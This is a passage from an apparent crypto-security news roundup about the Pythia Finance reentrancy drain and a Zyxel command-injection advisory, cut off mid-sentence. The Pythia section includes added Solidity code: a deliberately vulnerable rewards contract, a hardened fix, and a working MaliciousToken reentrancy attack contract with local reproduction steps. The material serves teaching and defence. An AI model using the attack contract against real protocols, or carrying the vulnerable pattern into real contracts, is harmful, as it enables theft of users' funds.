2 auditors miss $27M Penpie flaw, Pythia’s ‘claim rewards’ bug: Crypto-Sec

Pythia hit with reentrancy attack

Decentralized finance protocol Pythia Finance was drained of $53,000 via a reentrancy attack on Sept. 3, according to a report from blockchain security firm Quill Audits. Pythia is an algorithmic stablecoin project that aims to use artificial intelligence to manage its treasury.

The attacker called the “claim rewards” function repeatedly, re-entering it before the reward balance from the previous call had been updated, which allowed them to collect more rewards than they were entitled to.

According to the report, the attacker was able to call this function repeatedly and in rapid succession because Pythia called the token’s “safe transfer” function when rewards were distributed, handing control to the token contract before the reward balance was updated. A malicious token contract could therefore call back into Pythia, which would call the token again, and so on, in a chain of nested calls that could drain the protocol’s funds.

Screenshot of Pythia partial audit report. (Pythia / X).

Quill Audits’ partial audit report for Pythia shows zero unresolved security issues, implying that the team may have upgraded the contract to prevent any further use of this exploit.

A reentrancy attack, in which an attacker re-enters a function before a previous invocation of it has finished executing and updating the contract’s state, is one of the most common types of smart contract exploits.
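The pattern described in the two paragraphs above, as an added example: the Solidity below is illustrative code written for this page, not Pythia’s contract and not anything from the QuillAudits report. The contract names (RewardsVulnerable, RewardsHardened, MaliciousToken), the credit() and attack() helpers, and the assumption that the reward token address is attacker-controlled are all hypothetical; a plain transfer() stands in for the “safe transfer” wrapper, since what matters is that it is an external call made before the balance is zeroed.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

/// Minimal reward-token interface; transfer() is the external call that hands control away.
interface IRewardToken {
    function transfer(address to, uint256 amount) external returns (bool);
}

/// Vulnerable pattern (hypothetical, not Pythia's code): the transfer runs before the balance is zeroed.
contract RewardsVulnerable {
    IRewardToken public immutable rewardToken; // assumed attacker-controlled in the attack below
    mapping(address => uint256) public pendingRewards;

    constructor(IRewardToken token) {
        rewardToken = token;
    }

    /// Hypothetical helper standing in for whatever accrues rewards in a real protocol.
    function credit(address user, uint256 amount) external {
        pendingRewards[user] += amount;
    }

    function claimRewards() external {
        uint256 amount = pendingRewards[msg.sender];
        require(amount > 0, "nothing to claim");
        // Interaction before effect: a malicious token can re-enter claimRewards() from
        // inside transfer(), and every re-entrant call still sees the old, nonzero balance.
        require(rewardToken.transfer(msg.sender, amount), "transfer failed");
        pendingRewards[msg.sender] = 0; // too late: already paid out once per re-entry
    }
}

/// Hardened pattern: checks-effects-interactions plus a mutex-style reentrancy guard.
contract RewardsHardened {
    IRewardToken public immutable rewardToken;
    mapping(address => uint256) public pendingRewards;
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    constructor(IRewardToken token) {
        rewardToken = token;
    }

    function credit(address user, uint256 amount) external {
        pendingRewards[user] += amount;
    }

    function claimRewards() external nonReentrant {
        uint256 amount = pendingRewards[msg.sender];
        require(amount > 0, "nothing to claim");
        pendingRewards[msg.sender] = 0; // effect first: a re-entrant call now sees zero
        require(rewardToken.transfer(msg.sender, amount), "transfer failed");
    }
}

/// Attacker-controlled token (hypothetical). It is also the claimant, so msg.sender inside
/// claimRewards() is this contract on both the outer call and every re-entrant call.
contract MaliciousToken is IRewardToken {
    uint256 public paidOut;        // total the rewards contract asked us to pay out
    uint256 public depth;          // current re-entry depth
    uint256 public constant MAX_DEPTH = 5;
    bool public reentryBlocked;    // set when the victim refused the re-entrant call

    function attack(address rewards) external {
        depth = 0;
        paidOut = 0;
        reentryBlocked = false;
        (bool ok, ) = rewards.call(abi.encodeWithSignature("claimRewards()"));
        require(ok, "outer claim failed");
    }

    function transfer(address, uint256 amount) external override returns (bool) {
        paidOut += amount;
        if (depth < MAX_DEPTH) {
            depth++;
            // msg.sender is the rewards contract: re-enter before it updates its state.
            (bool ok, ) = msg.sender.call(abi.encodeWithSignature("claimRewards()"));
            if (!ok) reentryBlocked = true; // the guarded version reverts here
            depth--;
        }
        return true;
    }
}
```

To reproduce the two outcomes in a local test (Foundry, Hardhat or Remix): deploy MaliciousToken, deploy RewardsVulnerable with the token’s address, call credit(token, 1 ether) and then token.attack(vulnerable); paidOut ends at 6 ether, one payout for the outer call plus one for each of the five nested re-entries, because the balance is only zeroed as the calls unwind. Repeat against RewardsHardened and paidOut ends at 1 ether with reentryBlocked set: the balance is zeroed before the transfer, and the nonReentrant guard rejects the nested call outright. The guard is belt-and-braces; ordering the state write before the external call is the fix that removes the bug, and the guard limits the blast radius of any call order a later change gets wrong.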

Zyxel critical vulnerability

On Sept. 4, networking hardware manufacturer Zyxel disclosed a critical vulnerability in some of its networking devices that could have allowed an attacker to execute operating-system commands on affected routers and access points, and thereby gain control of users’ devices.

According to the disclosure, the vulnerability was the result of “The improper neutralization of special elements in the parameter ‘host’ in the CGI program” of several different firmware versions. Because of this improper neutralization, these firmware versions “could allow an unauthenticated attacker to execute OS…
